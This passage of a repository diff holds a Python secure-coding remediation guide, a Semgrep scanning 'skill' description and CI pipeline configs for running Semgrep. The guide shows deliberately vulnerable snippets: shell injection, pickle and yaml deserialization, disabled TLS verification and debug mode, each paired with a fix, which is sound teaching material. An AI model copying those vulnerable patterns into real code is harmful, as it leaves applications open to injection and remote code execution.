user_id = request.GET['id']
query = "SELECT * FROM users WHERE id = %s"
cursor.execute(query, (user_id,))
# Multiple parameters
query = "SELECT * FROM users WHERE username = %s AND active = %s"
cursor.execute(query, (username, True))
# Named parameters
query = "SELECT * FROM users WHERE username = %(username)s AND email = %(email)s"
cursor.execute(query, {'username': username, 'email': email})
```
**Secure Solution with SQLAlchemy ORM:**
```python
from sqlalchemy import create_engine, select, text
from sqlalchemy.orm import Session
# Using ORM (SAFE)
with Session(engine) as session:
stmt = select(User).where(User.username == username)
user = session.execute(stmt).scalar_one_or_none()
# Using bound parameters with raw SQL (SAFE)
with Session(engine) as session:
result = session.execute(
text("SELECT * FROM users WHERE username = :username"),
{"username": username}
)
```
**Secure Solution with Django ORM:**
```python
from django.db.models import Q
# Django ORM (SAFE)
users = User.objects.filter(username=username)
# Complex queries (SAFE)
users = User.objects.filter(Q(username=username) | Q(email=email))
# Raw SQL with parameters (SAFE)
from django.db import connection
with connection.cursor() as cursor:
cursor.execute("SELECT * FROM users WHERE username = %s", [username])
```
**Best Practices:**
- Always use parameterized queries or prepared statements
- Never concatenate user input into SQL queries
- Use ORM when possible for automatic escaping
- Validate and sanitize inputs at application boundaries
- Apply least privilege principle to database accounts
---
## Command Injection
### B602, B604, B605: Shell Injection in Subprocess
**Vulnerable Code:**
```python
import subprocess
import os
# shell=True with user input (VERY UNSAFE)
filename = request.GET['file']
subprocess.call(f"cat {filename}", shell=True)
# os.system with user input (VERY UNSAFE)
os.system(f"ping -c 1 {hostname}")
# String concatenation (UNSAFE)
cmd = "curl " + user_url
subprocess.call(cmd, shell=True)
```
**Secure Solution:**
```python
import re
import subprocess
import shlex
from pathlib import Path
# Use list of arguments without shell=True (SAFE)
filename = request.GET['file']
subprocess.run(["cat", filename], check=True, capture_output=True)
# Validate input before use
def validate_filename(filename):
"""Validate filename to prevent path traversal."""
# Allow only alphanumeric, dash, underscore, and dot
if not re.match(r'^[a-zA-Z0-9_.-]+$', filename):
raise ValueError("Invalid filename")
# Resolve to absolute path and check it's within allowed directory
file_path = Path(UPLOAD_DIR) / filename
if not file_path.resolve().is_relative_to(Path(UPLOAD_DIR).resolve()):
raise ValueError("Path traversal detected")
return file_path
filename = validate_filename(request.GET['file'])
subprocess.run(["cat", str(filename)], check=True, capture_output=True)
# Use shlex.split() for complex commands
import shlex
command_string = "ping -c 1 example.com"
subprocess.run(shlex.split(command_string), check=True, capture_output=True)
# Whitelist approach for restricted commands
ALLOWED_COMMANDS = {
'ping': ['ping', '-c', '1'],
'traceroute': ['traceroute', '-m', '10'],
}
command_type = request.GET['command']
target = request.GET['target']
if command_type not in ALLOWED_COMMANDS:
raise ValueError("Command not allowed")
# Validate target (e.g., IP address or hostname)
if not re.match(r'^[a-zA-Z0-9.-]+$', target):
raise ValueError("Invalid target")
cmd = ALLOWED_COMMANDS[command_type] + [target]
subprocess.run(cmd, check=True, capture_output=True, timeout=10)
```
**Best Practices:**
- Never use `shell=True` with user input
- Pass arguments as list, not string
- Validate and whitelist all user inputs
- Use `shlex.split()` for parsing command strings
- Implement timeouts to prevent DoS
- Run subprocesses with minimal privileges
---
## Weak Cryptography
### B303, B324: Weak Hash Functions
**Vulnerable Code:**
```python
import hashlib
import md5 # Deprecated
# MD5 (WEAK)
password_hash = hashlib.md5(password.encode()).hexdigest()
# SHA1 (WEAK)
token = hashlib.sha1(user_data.encode()).hexdigest()
```
**Secure Solution:**
```python
import hashlib
import secrets
import bcrypt
from argon2 import PasswordHasher
# SHA-256 for general hashing (ACCEPTABLE for non-password data)
data_hash = hashlib.sha256(data.encode()).hexdigest()
# SHA-512 (BETTER for general hashing)
data_hash = hashlib.sha512(data.encode()).hexdigest()
# bcrypt for password hashing (RECOMMENDED)
def hash_password(password: str) -> bytes:
"""Hash password using bcrypt with salt."""
salt = bcrypt.gensalt(rounds=12) # Cost factor 12
return bcrypt.hashpw(password.encode(), salt)
def verify_password(password: str, hashed: bytes) -> bool:
"""Verify password against bcrypt hash."""
return bcrypt.checkpw(password.encode(), hashed)
# Argon2 for password hashing (BEST - winner of Password Hashing Competition)
ph = PasswordHasher(
time_cost=2, # Number of iterations
memory_cost=65536, # Memory usage in KiB (64 MB)
parallelism=4, # Number of parallel threads
)
def hash_password_argon2(password: str) -> str:
"""Hash password using Argon2."""
return ph.hash(password)
def verify_password_argon2(password: str, hashed: str) -> bool:
"""Verify password against Argon2 hash."""
try:
ph.verify(hashed, password)
return True
except Exception:
return False
# HMAC for message authentication
import hmac
def create_signature(message: str, secret_key: bytes) -> str:
"""Create HMAC-SHA256 signature."""
return hmac.new(
secret_key,
message.encode(),
hashlib.sha256
).hexdigest()
```
### B501, B502, B503: Weak SSL/TLS Configuration
**Vulnerable Code:**
```python
import ssl
import requests
# Weak SSL version (UNSAFE)
context = ssl.SSLContext(ssl.PROTOCOL_SSLv3)
# Disabling certificate verification (VERY UNSAFE)
requests.get('https://example.com', verify=False)
```
**Secure Solution:**
```python
import ssl
import requests
# Strong SSL/TLS configuration (SAFE)
context = ssl.create_default_context()
context.minimum_version = ssl.TLSVersion.TLSv1_2
context.maximum_version = ssl.TLSVersion.TLSv1_3
# Restrict cipher suites
context.set_ciphers('ECDHE+AESGCM:ECDHE+CHACHA20:DHE+AESGCM:DHE+CHACHA20:!aNULL:!MD5:!DSS')
# Enable certificate verification (default in requests)
response = requests.get('https://example.com', verify=True)
# Custom CA bundle
response = requests.get('https://example.com', verify='/path/to/ca-bundle.crt')
# For urllib (urlopen does not accept both context and cafile, so bake the CA bundle into the context)
import urllib.request
import certifi
url = 'https://example.com'
context = ssl.create_default_context(cafile=certifi.where())
response = urllib.request.urlopen(url, context=context)
```
**Best Practices:**
- Use TLS 1.2 or TLS 1.3 only
- Disable weak cipher suites
- Always verify certificates in production
- Use certificate pinning for critical connections (a stdlib sketch follows this list)
- Regularly update SSL/TLS libraries
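For the pinning item above, a minimal standard-library sketch (it assumes the pin is the SHA-256 fingerprint of the server's DER-encoded leaf certificate, recorded out of band; the value shown is a placeholder):
```python
import hashlib
import ssl

# Placeholder fingerprint captured out of band for the pinned service
PINNED_SHA256 = "0000000000000000000000000000000000000000000000000000000000000000"

def verify_pin(host: str, port: int = 443) -> None:
    """Compare the server's leaf-certificate fingerprint against the pinned value."""
    pem = ssl.get_server_certificate((host, port))
    der = ssl.PEM_cert_to_DER_cert(pem)
    fingerprint = hashlib.sha256(der).hexdigest()
    if fingerprint != PINNED_SHA256:
        raise ssl.SSLError(f"Certificate pin mismatch for {host}: {fingerprint}")
```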
---
## Insecure Deserialization
### B301: Pickle Usage
**Vulnerable Code:**
```python
import pickle
# Deserializing untrusted data (VERY UNSAFE)
user_data = pickle.loads(request.body)
# Loading from file (UNSAFE if file is from untrusted source)
with open('user_session.pkl', 'rb') as f:
session = pickle.load(f)
```
**Secure Solution:**
```python
import json
import os
import msgpack
from cryptography.fernet import Fernet
# Use JSON for simple data (SAFE)
user_data = json.loads(request.body)
# Use MessagePack for binary efficiency (SAFE)
user_data = msgpack.unpackb(request.body)
# If pickle is absolutely necessary, use cryptographic signing
import hmac
import hashlib
import pickle
SECRET_KEY = os.environ['SECRET_KEY'].encode()
def secure_pickle_dumps(obj):
"""Serialize with HMAC signature."""
pickled = pickle.dumps(obj)
signature = hmac.new(SECRET_KEY, pickled, hashlib.sha256).digest()
return signature + pickled
def secure_pickle_loads(data):
"""Deserialize with signature verification."""
signature = data[:32] # SHA256 is 32 bytes
pickled = data[32:]
expected_signature = hmac.new(SECRET_KEY, pickled, hashlib.sha256).digest()
if not hmac.compare_digest(signature, expected_signature):
raise ValueError("Invalid signature - data may be tampered")
return pickle.loads(pickled)
# Better: Use itsdangerous for secure serialization
from itsdangerous import URLSafeSerializer
serializer = URLSafeSerializer(SECRET_KEY)
# Serialize (signed and safe)
token = serializer.dumps({'user_id': 123, 'role': 'admin'})
# Deserialize (verified)
data = serializer.loads(token)
```
**Best Practices:**
- Avoid pickle for untrusted data
- Use JSON, MessagePack, or Protocol Buffers
- If pickle is required, implement cryptographic signing
- Use `itsdangerous` library for secure token serialization
- Restrict pickle to internal, trusted data only
---
## XML External Entity (XXE)
### B313-B320, B405-B412: XML Parsing Vulnerabilities
**Vulnerable Code:**
```python
import xml.etree.ElementTree as ET
from lxml import etree
# Unsafe XML parsing (VULNERABLE to XXE)
tree = ET.parse(user_xml_file)
root = tree.getroot()
# lxml unsafe parsing
parser = etree.XMLParser()
tree = etree.parse(user_xml_file, parser)
```
**Secure Solution:**
```python
import xml.etree.ElementTree as ET
from lxml import etree
import defusedxml.ElementTree as defusedET
# Use defusedxml (RECOMMENDED)
tree = defusedET.parse(user_xml_file)
root = tree.getroot()
# Note: the stdlib ElementTree does not resolve external entities by default,
# but it offers no hardening switches; prefer defusedxml for any untrusted XML
# Secure lxml configuration
parser = etree.XMLParser(
resolve_entities=False, # Disable entity resolution
no_network=True, # Disable network access
dtd_validation=False, # Disable DTD validation
load_dtd=False # Don't load DTD
)
tree = etree.parse(user_xml_file, parser)
# Alternative: Use JSON instead of XML when possible
import json
data = json.loads(request.body)
```
**Best Practices:**
- Use `defusedxml` library for all XML parsing
- Disable DTD processing and external entity resolution
- Validate XML against strict schema (XSD)
- Consider using JSON instead of XML for APIs
- Never parse XML from untrusted sources without defusedxml
---
## Security Misconfiguration
### B201: Flask Debug Mode
**Vulnerable Code:**
```python
from flask import Flask
app = Flask(__name__)
# Debug mode in production (VERY UNSAFE)
app.run(debug=True, host='0.0.0.0')
```
**Secure Solution:**
```python
from flask import Flask
import os
app = Flask(__name__)
# Use environment-based configuration
DEBUG = os.environ.get('FLASK_DEBUG', 'false').lower() == 'true'
ENV = os.environ.get('FLASK_ENV', 'production')
if ENV == 'production' and DEBUG:
raise ValueError("Debug mode cannot be enabled in production")
app.config['DEBUG'] = DEBUG
app.config['ENV'] = ENV
app.config['SECRET_KEY'] = os.environ['SECRET_KEY']
# Use production WSGI server
if ENV == 'production':
# Deploy with gunicorn or uwsgi, not app.run()
# gunicorn -w 4 -b 0.0.0.0:8000 app:app
pass
else:
app.run(debug=DEBUG, host='127.0.0.1', port=5000)
```
### B506: YAML Load
**Vulnerable Code:**
```python
import yaml
# Arbitrary code execution (VERY UNSAFE)
config = yaml.load(user_input, Loader=yaml.Loader)
```
**Secure Solution:**
```python
import yaml
# Safe YAML loading (SAFE)
config = yaml.safe_load(user_input)
# For complex objects, use schema validation
from schema import Schema, And, Use, Optional
config_schema = Schema({
'database': {
'host': And(str, len),
'port': And(Use(int), lambda n: 1024 <= n <= 65535),
},
Optional('debug'): bool,
})
config = yaml.safe_load(user_input)
validated_config = config_schema.validate(config)
```
### B701, B702, B703: Template Autoescape
**Vulnerable Code:**
```python
from jinja2 import Environment
# Autoescape disabled (XSS VULNERABLE)
env = Environment(autoescape=False)
template = env.from_string(user_template)
output = template.render(name=user_input)
```
**Secure Solution:**
```python
from jinja2 import Environment, select_autoescape
from markupsafe import Markup, escape
# Enable autoescape (SAFE)
env = Environment(
autoescape=select_autoescape(['html', 'xml'])
)
# Or for all templates
env = Environment(autoescape=True)
# Explicitly mark safe content
def render_html(content):
# Sanitize first
clean_content = escape(content)
return Markup(clean_content)
# Django: Ensure autoescape is enabled (default)
# In Django templates:
# {{ user_input }} <!-- Auto-escaped -->
# {{ user_input|safe }} <!-- Only use after sanitization -->
```
**Best Practices:**
- Always enable autoescape in template engines
- Never mark user input as safe without sanitization
- Use Content Security Policy (CSP) headers
- Validate and sanitize all user inputs
- Use templating libraries with secure defaults
---
## General Security Principles
1. **Defense in Depth**: Implement multiple layers of security controls
2. **Least Privilege**: Grant minimum necessary permissions
3. **Fail Securely**: Errors should not expose sensitive information
4. **Input Validation**: Validate all inputs at trust boundaries
5. **Output Encoding**: Encode data based on output context
6. **Secure Defaults**: Use secure configurations by default
7. **Keep Dependencies Updated**: Regularly update security libraries
8. **Security Testing**: Include security tests in CI/CD pipelines
## Additional Resources
- [OWASP Cheat Sheet Series](https://cheatsheetseries.owasp.org/)
- [Python Security Best Practices](https://python.readthedocs.io/en/stable/library/security_warnings.html)
- [CWE Top 25](https://cwe.mitre.org/top25/)

View File

@@ -0,0 +1,284 @@
---
name: sast-semgrep
description: >
Static application security testing (SAST) using Semgrep for vulnerability detection,
security code review, and secure coding guidance with OWASP and CWE framework mapping.
Use when: (1) Scanning code for security vulnerabilities across multiple languages,
(2) Performing security code reviews with pattern-based detection, (3) Integrating
SAST checks into CI/CD pipelines, (4) Providing remediation guidance with OWASP Top 10
and CWE mappings, (5) Creating custom security rules for organization-specific patterns,
(6) Analyzing dependencies for known vulnerabilities.
version: 0.1.0
maintainer: SirAppSec
category: appsec
tags: [sast, semgrep, vulnerability-scanning, code-security, owasp, cwe, security-review]
frameworks: [OWASP, CWE, SANS-25]
dependencies:
python: ">=3.8"
packages: [semgrep]
tools: [git]
references:
- https://semgrep.dev/docs/
- https://owasp.org/Top10/
- https://cwe.mitre.org/
---
# SAST with Semgrep
## Overview
Perform comprehensive static application security testing using Semgrep, a fast, open-source
static analysis tool. This skill provides automated vulnerability detection, security code
review workflows, and remediation guidance mapped to OWASP Top 10 and CWE standards.
## Quick Start
Scan a codebase for security vulnerabilities:
```bash
semgrep --config=auto --severity=ERROR --severity=WARNING /path/to/code
```
Run with OWASP Top 10 ruleset:
```bash
semgrep --config="p/owasp-top-ten" /path/to/code
```
## Core Workflows
### Workflow 1: Initial Security Scan
1. Identify the primary languages in the codebase
2. Run `scripts/semgrep_scan.py` with appropriate rulesets
3. Parse findings and categorize by severity (CRITICAL, HIGH, MEDIUM, LOW)
4. Map findings to OWASP Top 10 and CWE categories (a parsing sketch follows this list)
5. Generate prioritized remediation report
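A minimal sketch of steps 3-4, assuming Semgrep's JSON output in which each entry under `results` exposes `extra.severity` and, for registry rules, `extra.metadata.owasp`:
```python
import json
from collections import Counter

# Report produced with: semgrep --config=auto --json --output=semgrep.json
with open("semgrep.json") as f:
    results = json.load(f).get("results", [])

by_severity = Counter(r["extra"]["severity"] for r in results)
by_owasp = Counter(
    str(r["extra"].get("metadata", {}).get("owasp", "unmapped")) for r in results
)

print("Findings by severity:", dict(by_severity))
print("Findings by OWASP category:", dict(by_owasp))
```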
### Workflow 2: Security Code Review
1. For pull requests or commits, run targeted scans on changed files
2. Use `semgrep --baseline-commit <base>` to report only issues introduced by the change
3. Flag high-severity findings as blocking issues
4. Provide inline remediation guidance from `references/remediation_guide.md`
5. Link findings to secure coding patterns
### Workflow 3: Custom Rule Development
1. Identify organization-specific security patterns to detect
2. Create custom Semgrep rules in YAML format using `assets/rule_template.yaml`
3. Test rules against known vulnerable code samples
4. Integrate custom rules into CI/CD pipeline
5. Document rules in `references/custom_rules.md`
### Workflow 4: CI/CD Integration
1. Add Semgrep to CI/CD pipeline using `assets/ci_config_examples/`
2. Configure baseline scanning for pull requests
3. Set severity thresholds (fail on CRITICAL/HIGH)
4. Generate SARIF output for security dashboards
5. Track metrics: vulnerabilities found, fix rate, false positives
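For the metrics step, two JSON reports can be compared to approximate new and fixed findings (a rough sketch: findings are keyed on rule ID and file path, so moved lines are tolerated but repeated findings of the same rule in one file collapse together):
```python
import json

def finding_keys(report_path: str) -> set[tuple[str, str]]:
    """Collect (rule id, file path) pairs from a Semgrep JSON report."""
    with open(report_path) as f:
        return {(r["check_id"], r["path"]) for r in json.load(f).get("results", [])}

baseline = finding_keys("baseline.json")
current = finding_keys("current.json")

print(f"New findings:   {len(current - baseline)}")
print(f"Fixed findings: {len(baseline - current)}")
```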
## Security Considerations
- **Sensitive Data Handling**: Semgrep scans code locally; ensure scan results don't leak
secrets or proprietary code patterns. Use `--max-lines-per-finding` to limit output.
- **Access Control**: Semgrep scans require read access to source code. Restrict scan
result access to authorized security and development teams.
- **Audit Logging**: Log all scan executions with timestamps, user, commit hash, and
findings count for compliance auditing (a minimal logging sketch follows this list).
- **Compliance**: SAST scanning supports SOC2, PCI-DSS, and GDPR compliance requirements.
Maintain scan history and remediation tracking.
- **Safe Defaults**: Use `--config=auto` for balanced detection. For security-critical
applications, use `--config="p/security-audit"` for comprehensive coverage.
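A minimal audit-logging sketch for the point above (it appends one JSON line per scan, assumes the scan runs inside a git checkout, and uses an illustrative log path):
```python
import datetime
import getpass
import json
import subprocess

def log_scan(report_path: str, audit_log: str = "semgrep-audit.log") -> None:
    """Append one JSON line describing a completed Semgrep scan."""
    with open(report_path) as f:
        findings = len(json.load(f).get("results", []))
    commit = subprocess.run(
        ["git", "rev-parse", "HEAD"], capture_output=True, text=True, check=True
    ).stdout.strip()
    entry = {
        "timestamp": datetime.datetime.now(datetime.timezone.utc).isoformat(),
        "user": getpass.getuser(),
        "commit": commit,
        "findings": findings,
    }
    with open(audit_log, "a") as f:
        f.write(json.dumps(entry) + "\n")
```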
## Language Support
Semgrep supports 30+ languages including:
- **Web**: JavaScript, TypeScript, Python, Ruby, PHP, Java, C#, Go
- **Mobile**: Swift, Kotlin, Java (Android)
- **Infrastructure**: Terraform, Dockerfile, YAML, JSON
- **Other**: C, C++, Rust, Scala, Solidity
## Bundled Resources
### Scripts
- `scripts/semgrep_scan.py` - Full-featured scanning with OWASP/CWE mapping and reporting
- `scripts/baseline_scan.sh` - Quick baseline scan for CI/CD
- `scripts/diff_scan.sh` - Scan only changed files (for PRs)
### References
- `references/owasp_cwe_mapping.md` - OWASP Top 10 to CWE mapping with Semgrep rules
- `references/remediation_guide.md` - Vulnerability remediation patterns by category
- `references/rule_library.md` - Curated list of useful Semgrep rulesets
### Assets
- `assets/rule_template.yaml` - Template for creating custom Semgrep rules
- `assets/ci_config_examples/` - CI/CD integration examples (GitHub Actions, GitLab CI)
- `assets/semgrep_config.yaml` - Recommended Semgrep configuration
## Common Patterns
### Pattern 1: Daily Security Baseline Scan
```bash
# Run comprehensive scan and generate report
scripts/semgrep_scan.py --config security-audit \
--output results.json \
--format json \
--severity HIGH CRITICAL
```
### Pattern 2: Pull Request Security Gate
```bash
# Scan only changed files, fail on HIGH/CRITICAL
scripts/diff_scan.sh --fail-on high \
--base-branch main \
--output sarif
```
### Pattern 3: Vulnerability Research
```bash
# Search for specific vulnerability patterns
semgrep --config "r/javascript.lang.security.audit.xss" \
--json /path/to/code | jq '.results'
```
### Pattern 4: Custom Rule Validation
```bash
# Test custom rule against vulnerable samples
semgrep --config assets/custom_rules.yaml \
--test tests/vulnerable_samples/
```
## Integration Points
### CI/CD Integration
- **GitHub Actions**: Use `semgrep/semgrep-action@v1` with SARIF upload
- **GitLab CI**: Run as security scanning job with artifact reports
- **Jenkins**: Execute as build step with quality gate integration
- **pre-commit hooks**: Run lightweight scans on staged files
See `assets/ci_config_examples/` for ready-to-use configurations.
### Security Tool Integration
- **SIEM/SOAR**: Export findings in JSON/SARIF for ingestion
- **Vulnerability Management**: Integrate with Jira, DefectDojo, or ThreadFix
- **IDE Integration**: Use Semgrep IDE plugins for real-time detection
- **Secret Scanning**: Combine with tools like trufflehog, gitleaks
### SDLC Integration
- **Requirements Phase**: Define security requirements and custom rules
- **Development**: IDE plugins provide real-time feedback
- **Code Review**: Automated security review in PR workflow
- **Testing**: Integrate with security testing framework
- **Deployment**: Final security gate before production
## Severity Classification
Semgrep findings are classified by severity:
- **CRITICAL**: Exploitable vulnerabilities (SQLi, RCE, Auth bypass)
- **HIGH**: Significant security risks (XSS, CSRF, sensitive data exposure)
- **MEDIUM**: Security weaknesses (weak crypto, missing validation)
- **LOW**: Code quality issues with security implications
- **INFO**: Security best practice recommendations
## Performance Optimization
For large codebases:
```bash
# Use --jobs for parallel scanning
semgrep --config auto --jobs 4
# Exclude vendor/test code
semgrep --config auto --exclude "vendor/" --exclude "test/"
# Use lightweight rulesets for faster feedback
semgrep --config "p/owasp-top-ten" --exclude-rule "generic.*"
```
## Troubleshooting
### Issue: Too Many False Positives
**Solution**:
- Use `--exclude-rule` to disable noisy rules
- Create `.semgrepignore` file to exclude false positive patterns
- Tune rules using `--severity` filtering
- Add `# nosemgrep` comments for confirmed false positives (with justification)
### Issue: Scan Taking Too Long
**Solution**:
- Use `--exclude` for vendor/generated code
- Increase `--jobs` for parallel processing
- Use targeted rulesets instead of `--config=auto`
- Run incremental scans with `--baseline-commit`
### Issue: Missing Vulnerabilities
**Solution**:
- Use comprehensive rulesets: `p/security-audit` or `p/owasp-top-ten`
- Consult `references/rule_library.md` for specialized rules
- Create custom rules for organization-specific patterns
- Combine with dynamic analysis (DAST) and dependency scanning
## Advanced Usage
### Creating Custom Rules
See `references/rule_library.md` for guidance on writing effective Semgrep rules.
Use `assets/rule_template.yaml` as a starting point.
Example rule structure:
```yaml
rules:
- id: custom-sql-injection
patterns:
- pattern: execute($QUERY)
- pattern-inside: |
$QUERY = $USER_INPUT + ...
message: Potential SQL injection from user input concatenation
severity: ERROR
languages: [python]
metadata:
cwe: "CWE-89"
owasp: "A03:2021-Injection"
```
### OWASP Top 10 Coverage
This skill provides detection for all OWASP Top 10 2021 categories.
See `references/owasp_cwe_mapping.md` for complete coverage matrix.
## Best Practices
1. **Baseline First**: Establish security baseline before enforcing gates
2. **Progressive Rollout**: Start with HIGH/CRITICAL, expand to MEDIUM over time
3. **Developer Training**: Educate team on common vulnerabilities and fixes
4. **Rule Maintenance**: Regularly update rulesets and tune for your stack
5. **Metrics Tracking**: Monitor vulnerability trends, MTTR, and false positive rate
6. **Defense in Depth**: Combine with DAST, SCA, and manual code review
## References
- [Semgrep Documentation](https://semgrep.dev/docs/)
- [Semgrep Rule Registry](https://semgrep.dev/explore)
- [OWASP Top 10 2021](https://owasp.org/Top10/)
- [CWE Top 25](https://cwe.mitre.org/top25/)
- [SANS Top 25](https://www.sans.org/top25-software-errors/)

View File

@@ -0,0 +1,141 @@
# GitHub Actions - Semgrep Security Scanning
# Save as .github/workflows/semgrep.yml
name: Semgrep Security Scan
on:
# Scan on push to main/master
push:
branches:
- main
- master
# Scan pull requests
pull_request:
branches:
- main
- master
# Manual trigger
workflow_dispatch:
# Schedule daily scans
schedule:
- cron: '0 0 * * *' # Run at midnight UTC
jobs:
semgrep:
name: SAST Security Scan
runs-on: ubuntu-latest
# Required for uploading results to GitHub Security
permissions:
security-events: write
actions: read
contents: read
steps:
- name: Checkout code
uses: actions/checkout@v4
- name: Run Semgrep
uses: semgrep/semgrep-action@v1
with:
# Ruleset to use
config: >-
p/security-audit
p/owasp-top-ten
p/cwe-top-25
# Generate SARIF for GitHub Security
publishToken: ${{ secrets.SEMGREP_APP_TOKEN }}
publishDeployment: ${{ secrets.SEMGREP_DEPLOYMENT_ID }}
# Fail on HIGH/ERROR severity
# auditOn: push
- name: Upload SARIF to GitHub Security
if: always()
uses: github/codeql-action/upload-sarif@v3
with:
sarif_file: semgrep.sarif
- name: Upload scan results as artifact
if: always()
uses: actions/upload-artifact@v4
with:
name: semgrep-results
path: semgrep.sarif
# Alternative: Simpler configuration without Semgrep Cloud
---
name: Semgrep Security Scan (Simple)
on:
pull_request:
branches: [main, master]
push:
branches: [main, master]
jobs:
semgrep:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4
- name: Set up Python
uses: actions/setup-python@v5
with:
python-version: '3.11'
- name: Install Semgrep
run: pip install semgrep
- name: Run Semgrep Scan
run: |
semgrep --config="p/security-audit" \
--config="p/owasp-top-ten" \
--sarif \
--output=semgrep-results.sarif \
--severity=ERROR \
--severity=WARNING
- name: Upload SARIF results
if: always()
uses: github/codeql-action/upload-sarif@v3
with:
sarif_file: semgrep-results.sarif
# PR-specific: Only scan changed files
---
name: Semgrep PR Scan
on:
pull_request:
jobs:
semgrep-diff:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4
with:
fetch-depth: 0 # Fetch full history for diff
- name: Install Semgrep
run: pip install semgrep
- name: Scan changed files only
run: |
semgrep --config="p/security-audit" \
--baseline-commit="${{ github.event.pull_request.base.sha }}" \
--json \
--output=results.json
- name: Check for findings
run: |
FINDINGS=$(jq '.results | length' results.json)
echo "Found $FINDINGS security issues"
if [ "$FINDINGS" -gt 0 ]; then
echo "❌ Security issues detected!"
jq '.results[] | "[\(.extra.severity)] \(.check_id) - \(.path):\(.start.line)"' results.json
exit 1
else
echo "✅ No security issues found"
fi

View File

@@ -0,0 +1,106 @@
# GitLab CI - Semgrep Security Scanning
# Add to .gitlab-ci.yml
stages:
- test
- security
# Basic Semgrep scan
semgrep-scan:
stage: security
image: semgrep/semgrep:latest
script:
- semgrep --config="p/security-audit"
--config="p/owasp-top-ten"
--gitlab-sast
--output=gl-sast-report.json
artifacts:
reports:
sast: gl-sast-report.json
paths:
- gl-sast-report.json
expire_in: 1 week
rules:
- if: $CI_MERGE_REQUEST_ID # Run on MRs
- if: $CI_COMMIT_BRANCH == $CI_DEFAULT_BRANCH # Run on default branch
# Advanced: Fail on HIGH severity findings
semgrep-strict:
stage: security
image: python:3.11-slim
before_script:
- pip install semgrep
script:
- |
semgrep --config="p/security-audit" \
--severity=ERROR \
--json \
--output=results.json
CRITICAL=$(jq '[.results[] | select(.extra.severity == "ERROR")] | length' results.json)
echo "Found $CRITICAL critical findings"
if [ "$CRITICAL" -gt 0 ]; then
echo "❌ Critical security issues detected!"
jq '.results[] | select(.extra.severity == "ERROR")' results.json
exit 1
fi
artifacts:
paths:
- results.json
expire_in: 1 week
when: always
allow_failure: false
# Differential scanning - only new findings in MR
semgrep-diff:
stage: security
image: semgrep/semgrep:latest
script:
- git fetch origin $CI_MERGE_REQUEST_TARGET_BRANCH_NAME
- |
semgrep --config="p/security-audit" \
--baseline-commit="origin/$CI_MERGE_REQUEST_TARGET_BRANCH_NAME" \
--gitlab-sast \
--output=gl-sast-report.json
artifacts:
reports:
sast: gl-sast-report.json
rules:
- if: $CI_MERGE_REQUEST_ID
# Scheduled full scan (daily)
semgrep-scheduled:
stage: security
image: semgrep/semgrep:latest
script:
- |
semgrep --config="p/security-audit" \
--config="p/owasp-top-ten" \
--config="p/cwe-top-25" \
--json \
--output=full-scan-results.json
artifacts:
paths:
- full-scan-results.json
expire_in: 30 days
rules:
- if: $CI_PIPELINE_SOURCE == "schedule"
# Custom rules integration
semgrep-custom:
stage: security
image: semgrep/semgrep:latest
script:
- |
semgrep --config="p/owasp-top-ten" \
--config="custom-rules/security.yaml" \
--gitlab-sast \
--output=gl-sast-report.json
artifacts:
reports:
sast: gl-sast-report.json
rules:
- if: $CI_MERGE_REQUEST_ID
exists:
- custom-rules/security.yaml

View File

@@ -0,0 +1,190 @@
// Jenkinsfile - Semgrep Security Scanning
// Basic pipeline with Semgrep security gate
pipeline {
agent any
environment {
SEMGREP_VERSION = '1.50.0' // Pin to specific version
}
stages {
stage('Checkout') {
steps {
checkout scm
}
}
stage('Security Scan') {
steps {
script {
// Install Semgrep
sh 'pip3 install semgrep==${SEMGREP_VERSION}'
// Run Semgrep scan
sh '''
semgrep --config="p/security-audit" \
--config="p/owasp-top-ten" \
--json \
--output=semgrep-results.json \
--severity=ERROR \
--severity=WARNING
'''
}
}
}
stage('Process Results') {
steps {
script {
// Parse results
def results = readJSON file: 'semgrep-results.json'
def findings = results.results.size()
def critical = results.results.findAll {
it.extra.severity == 'ERROR'
}.size()
echo "Total findings: ${findings}"
echo "Critical findings: ${critical}"
// Fail build if critical findings
if (critical > 0) {
error("❌ Critical security vulnerabilities detected!")
}
}
}
}
}
post {
always {
// Archive scan results
archiveArtifacts artifacts: 'semgrep-results.json',
fingerprint: true
// Publish results (if using warnings-ng plugin)
// recordIssues(
// tools: [semgrep(pattern: 'semgrep-results.json')],
// qualityGates: [[threshold: 1, type: 'TOTAL', unstable: false]]
// )
}
failure {
echo '❌ Security scan failed - review findings'
}
success {
echo '✅ No critical security issues detected'
}
}
}
// Advanced: Differential scanning for PRs
pipeline {
agent any
environment {
TARGET_BRANCH = env.CHANGE_TARGET ?: 'main'
}
stages {
stage('Checkout') {
steps {
checkout scm
script {
// Fetch target branch for comparison
sh """
git fetch origin ${TARGET_BRANCH}:${TARGET_BRANCH}
"""
}
}
}
stage('Differential Scan') {
when {
changeRequest() // Only for pull requests
}
steps {
sh """
pip3 install semgrep
semgrep --config="p/security-audit" \
--baseline-commit="${TARGET_BRANCH}" \
--json \
--output=semgrep-diff.json
"""
script {
def results = readJSON file: 'semgrep-diff.json'
def newFindings = results.results.size()
if (newFindings > 0) {
echo "❌ ${newFindings} new security issues introduced"
error("Fix security issues before merging")
} else {
echo "✅ No new security issues"
}
}
}
}
stage('Full Scan') {
when {
branch 'main' // Full scan on main branch
}
steps {
sh """
semgrep --config="p/security-audit" \
--config="p/owasp-top-ten" \
--config="p/cwe-top-25" \
--json \
--output=semgrep-full.json
"""
}
}
}
post {
always {
archiveArtifacts artifacts: 'semgrep-*.json',
allowEmptyArchive: true
}
}
}
// With custom rules
pipeline {
agent any
stages {
stage('Security Scan with Custom Rules') {
steps {
sh """
pip3 install semgrep
# Run with both official and custom rules
semgrep --config="p/owasp-top-ten" \
--config="custom-rules/" \
--json \
--output=results.json
"""
script {
    // Summarize findings by severity from the JSON report
    def results = readJSON file: 'results.json'
    def findings = results.results
    echo "Security Scan Complete:"
    echo "  Total Findings: ${findings.size()}"
    ['ERROR', 'WARNING', 'INFO'].each { severity ->
        def count = findings.findAll { it.extra?.severity == severity }.size()
        echo "  ${severity}: ${count}"
    }
}
}
}
}
}

View File

@@ -0,0 +1,120 @@
rules:
- id: custom-rule-template
# Pattern matching - choose one or combine multiple
pattern: dangerous_function($ARG)
# OR use pattern combinations:
# patterns:
# - pattern: execute($QUERY)
# - pattern-inside: |
# $QUERY = $USER_INPUT + ...
# - pattern-not: execute("SAFE_QUERY")
# Message shown when rule matches
message: |
Potential security vulnerability detected.
Explain the risk and provide remediation guidance.
# Severity level
severity: ERROR # ERROR, WARNING, or INFO
